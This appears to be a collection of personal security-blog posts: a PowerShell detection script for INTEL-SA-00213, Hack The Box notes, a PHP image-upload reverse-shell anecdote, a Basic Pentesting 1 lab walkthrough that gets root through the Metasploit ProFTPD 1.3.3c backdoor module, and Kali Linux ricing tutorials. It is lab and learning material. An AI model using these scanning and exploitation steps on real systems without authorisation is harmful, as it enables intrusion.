It’s been fun and educational putting my INTEL-SA-00213 Detection Script together. first writing it, refining it, Adding SMB Logging getting feedback from the Reddit PowerShell folks, learning about the PSScriptAnalyzer, etc. But there comes a point where it’s time to walk away from something. This little tool does everything I need. I could tweak and add features, and obsess further, but why? What good will come of it. It’s been a a neat little project but it’s done.
I learned a good deal during this, so for my own mental retention, and to share them let’s recap. There is a preferred order in which to arrange comment based help. Temporary files are best handled using $env:TEMP and New-TemporaryFile. Don’t bother specifying Mandatory=$true or Mandatory=$false in parameters, as it’s implied. Use Write-Debug as a form of commenting instead of pure comments, as it has the added benefit of automatically adding -Verbose functionality. When testing a Web path for validating a parameter, use the -Method Head option for Invoke-WebRequest to avoid downloading the file twice.
This was also my first project build fully in Visual Studio Code and GitHub. Which I now love and will never go back to my old way of version control. (Which was, admittedly, kludgey and stupid…)
All in all, a fun exercise which produced a tool that I will be using to check for and mitigate live vulnerabilities. If you use it let me know, I’d love to hear how it works out for you. If you want any new features or changes, I’d be happy to do that as well.
Following up on yesterdays post about my INTEL-SA-00213 detection script I’ve added some logging functionality. It’s rudimentary, but effective. Pass a valid -LogDir argument and it will generate a results.txt file. The file contains the hostname and output separated by a comma. The script uses Add-Content as well so this can be run from multiple hosts and the results will be appended to existing content.
I plan to make the output file customization via argument as well, and still need to tie this thing into SCCM. As it stands right now though version 2.0 or 2.2 could easily be used for a GPO startup script.
This is rapidly becoming more than just a utility script. I’ve never drilled this deep into parameters before and am learning quite a bit. It’ll be good to keep adding more functionality until I’ve got this thing well baked and I’ve learned as much as I can from it.
Anyway, if anyone is interested, here’s a link to the GitHub repository. I’m always looking for ideas and feedback!
So CVE-2019-0090 / INTEL-SA-00213 looks rather ugly, especially given that there is no software fix available. So, I need to to see if any of my nodes are affected. To that end I’m putting together a quick and dirty PowerShell script to make scanning easier. As of now it can automatically download the Intel detection utility from the web from a custom HTTP(S) location or from SMB and then run it and report results.
In the next day or two I’m going to add the ability to log to a remote location and build out a SCCM package and hardware report.
For you you can pass the -DownloadFromWeb or -DownloadFromSMB arguments to tell the script how you’d like to obtain the file. You can also specity -WebURL and -SmbPath to tell the script to download from custom locations. By default the script will download the Intel utility directly from Intel. Stay tuned for updates.
If anyone is interested, here’s a link to the GitHub repository. I’m always looking for ideas and feedback!
I spent far too long trying to enumerate this one… But I learned a good deal about a system I’ve never touched before which is always a good thing. Once I got a foot hold the rest was fairly quick to fall into place. Overall I liked it. Will be putting together a walk through video of this one for sure.
Hacking things is an amazingly fun past time. But also maddening sometimes. It’s now hours 8 of trying to crack “Postman” on HTB. I know what I need, but can I figure out how to get that thing? Nope. But, like most of the things I do, I’ll keep going because I know at the end it will be worth it. That feeling of accomplishment is like nothing else. This thing isn’t going to solve itself so back to work!
So I’m working on a VM that looks to be exploitable via image upload.
It’s running apache and php, and has a custom made “upload image” form that leaves the images in a gallery. Should be easy enough, even for someone as inexperienced as me.
Well, today I learned not to use _halt_compiler() in an image based reverse shell attempt when I accidentally crashed PHP. Once the image was uploaded it instantly crashed all pages that load that image. DOH. As an upshot, I suppose this proves the PHP code is working though. Back to it.
If you’d like to try an attack like this, there’s currently on on Hack The Box I believe.
In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.
First things first, let’s find it with nmap.
nmap 192.168.1.0/24 > nmap-network_results.
which (among other things turned up the following VM which was new to my network.
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227) Host is up (0.0012s latency). Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Interestingly, looks like it’s hostname is vtcsec (made a note of that…) Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap.
nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt
Which produced the following results.
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227) Host is up (0.00094s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 – 4.9 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
Ok, now we’ve got the versions of the services. Let’s see if there’s any low hanging fruit here. I’ll check searchsploit for the FTP server.
searchsploit proftpd 1.3.3c
The output didn’t copy neatly to this blog format, (I run URXVT, so it’s likely some unicode that won’t translate to ASCII neatly… whatever). I did find two options availabl, the one that interests me was “Backdoor Command Execution (metasploit). So let’s fire up metasploit and see what we can do.
Metasploit loads up
It runs and there it is: exploit/unix/ftp/proftpd_133c backdoor! This should be easy enough then.
set rhost 192.168.1.227
Voila. I got a shell. Let’s see who I am.
I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.
If you haven’t gone through parts one and two, you should definitely do so before proceeding. In this tutorial we will cover installing the rofi application launcher, installing the polybar toolbar, and doing some additional tweaking to the UI elements.
This is fairly simple. Running “apt install rofi” will get the program installed. Then you just need to edit your ~/.i3/config file. Look for the line “bindsym Mod1+d exec dmenu_run” and replace it with “bindsym Mod1+d exec rofi -show run”. Log out, back in, test it and it and if it works… SNAP THE VM.
Start by installing the pre-requisistes. Run the command “apt install cmake cmake-data libcairo2-dev libxcb1-dev libxcb-ewmh-dev libxcb-icccm4-dev libxcb-image0-dev libxcb-randr0-dev libxcb-util0-dev libxcb-xkb-dev pkg-config python-xcbgen xcb-proto libxcb-xrm-dev libasound2-dev libmpdclient-dev libiw-dev libcurl4-openssl-dev libpulse-dev mpd libxcb-composite0-dev”
Once that is done, download polybar by running “git clone https://github.com/jaagr/polybar.git”, the build it by running “cd polybar && ./build.sh” You will be prompted to determine what you want to install, I just say yes to everything YMMV. Do your homework on that.
To actually turn on polybar, comment out the following section:
status_command i3status -t
Add the following line (possibly adjusting for your system:
exec_always –no-startup-id polybar pyrrh1c &
Once polybar is installed, you will need to configure it. I could write a lengthy tutorial on that… But for the sake of brevity you can just download my polybar config file and look at how it’s set up. This is the one piece I couldn’t reduce to an easy walk through. Basically, just make a folder in your .config folder called polybar, then copy the config file into it.
Install some additional Fonts
Polybar uses some special unicode characters. This doesn’t work well unless you install the appropriate fonts. (mainly siji and unifont) You can install unifont by simply running “apt install unifont”. Install Siji by running the following commands:
git clone https://github.com/stark/siji.git
Once that’s done, add the following lines to your .bashrc file
xset +fp /root/.fonts
xset fp rehash
Compton is a desktop compositor. It basically helps glue things together. To get it running, rust run “apt install compton”, then when it’s done edit your ~/.i3/config file an add the line “exec compton”.At this point your box should look somewhat like the one to the left.
Configure the Exit Sequence to Actually Exit
Edit your ~/.i3/config file. Look for the line “bindsym Mod1+Shift+e exec “i3-nagbar -t warning -m ‘You pressed the exit shortcut. Do you really want to exit i3? this will end you X session.” Change it to “bindsym Mod1+Shift+e exec i3-msg exit”. You will no longer be nagged when you want to exit.:q
That’s all for now. Stay tuned as I may do a more thorough overview for PolyBar at some point. Thanks for reading!
In this tutorial we will cover installing i3-gaps, the urxvt terminal emulator, feh, wal, and rofi. It’s assumed you went through part 1. If not, you may want to go read that now.
I’m not a fan of re-inventing the wheel. There’s a wonderful how-to for installing i3-gaps on Ubuntu that works well for Kali. Head over and follow it, then come back… Done? Great. Now reboot. At the log in screen enter the username, then after hitting next you’ll see a gear.
You’re now logged into the i3 window manager. This is a different world than most window managers. You will be very VERY well served by learning the basic commands and what they do. Take a few minutes to go over the i3 Reference Card and learn how to open up new terminal windows.
So you have probably noticed the ugly red error message by now. That’s a result of the I3 Status bar being referenced, but not installed. There are several options available for status bars (the i3 bar, polybarm lemon bar, etc.) in this series will just add the basic status bar for now. Maybe the polybar later. We’ll see.
So go ahead and open a terminal window with (usually by hitting [alt] + [enter]) and entering the following command: apt install i3status. Once that’s done log out ([alt] + [shift] + [e]) and back in. You should now see the red/white/green status bar. i3 is now ready to go in its most basic form.
Replace the default console app with URXVT
The default terminal doesn’t offer much flexibility so I like to replace it. My terminal of choice is URXVT. Install the URXVT terminal by running apt install rxvt-unicode.
Take a Snapshot!
Things are about to start getting messy. Snapshot now or proceed at your own peril. 😉
Make i3 the default terminal
I’ll assume you know how to edit text files in Linux. If not, here’s a link to using vi. I won’t lie though, if you are trying to Rice Kali Linux, and you don’t know how to edit a text file, I genuinely wonder how you ended up here. 😉
Anyway, edit the i3 config file which is ~/.i3/config. In there, find the line “bindsym Mod1+Return exec i3-sensible-terminal” and replace it with “bindsym Mod1+Return exec /usr/bin/urxvt”. Once it’s saved exit out of all terminal windows and reload the i3 config by pressing [alt]+[shift]+[r].
Remove the URXVT Scroll Bars and Apply Transparency
Create the file ~/.Xdefaults, and in it enter the following line to get rid of the scrollbar and apply transparency: URxvt*scrollBar: false (NOTE THE CAPITAL “B”!!!) URxvt*transparent: true URxvt*shading: 40
Install feh to Add a Wallpaper
Download a wallpaper you like, and save it somewhere easy to access.
(I’ll leave how you download it up to you…) I usually put it in /wallpapers and name it wallpaper.png or something similar. Install feh by running “apt install feh” Once it’s done edit your ~/.i3/config file to add the line exec –no-startup-id feh –bg-scale ‘/wallpapers/wallpaper.jpeg’ You now have a scaled background each time you log in. That said, the text is kind of an odd color. Let’s fix that.
Install and Configure PyWal
Running feh without pywal can make for some ugly (and possibly unusable) color schemes for the terminal. To fix that we use PyWal. Install Python3-pip by running “apt install install python3-pip”, then install pywal running “pip3 install pywal”. Once that’s done, add the following lines at the end of your .bashrc (according to the documentation you should put this in the .i3/config file but it NEVER LAUNCHES FOR ME!!!) wal -i /wallpapers/wallpaper.jpeg clear
Tighten up Those Gaps!
The tutorial is good, but I prefer a smaller gap.
So edit your ~/.i3/config file and update the following lines:
gaps inner 10
gaps outer 0
We made some serious progress here. We installed i3, the i3 status bar, URXVT, feh, and PyWal. We also configured some transparency and colors. Stay tuned for Part 3 where we’ll dig a little deeper and install rofi, polybar, and other fun stuff! Follow @_pyrrh1c_
In this tutorial I’m going to show you the basic techniques I use when ricing Kali Linux. But in case you don’t already know, let’s explain what ricing is first. Urban Dictionary defines ricing like this: “Ricing: To rice, or to soup up a crappy car with the mistaken idea that type ‘R’ stickers and performance yellow paint make it go faster.” In the spirit of that, the tweaks explained here don’t technically make Kali a more effective offensive security platform in and of themselves, but I find they make the interface easier to use, hence they boost my productivity. Let’s be honest, who doesn’t like a customized environment?
You can obtain the latest builds (ISO Images, OVA templates, etc.) from the Kali Linux download page or from the Offensive Security downloads page. For this tutorial, I’m going to deploy Kali virtually using VirtualBox. For the remainder of the tutorial, I’ll assume you are doing the same thing. You can obtain VirtualBox that from their download page.
Since we’re using VirtualBox, I downloaded and imported the 2018.4 OVA template from Offensive Security. If you need help doing that, take a look at the documentation. I named my machine “Pyrrh1c Linux” to differentiate it later from a stock Kali VM.
Immediately after you import the OVA, take a snapshot of the VM. I usually name it something like “VM Imported”. This allows me to undo any changes since the last snapshot was taken, which is important because mistakes happen, and it’s nice to only have to do one step over again instead of numerous.
Power on the machine, and you will shortly be at the login screen. No Install required! If you are following along and doing a traditional install of Kali and need some pointers for the install process, you may want to take a look a the Kali Linux Official Documentation.
Initial OS Preparations
Open up a terminal window and run the commands “apt update”, then “apt upgrade”. This ensures you have all the latest packages on your install. Go pour out a glass of Kraken, this will take a minute… When you get to the step that asks about grub, use the space bar to select /dev/sda and hit OK.
Ready to Go
With the OS installed and updated we are ready to get started customizing. Part 2 will covering installing the i3 window manager, feh, wal and rofi. That’s all for now!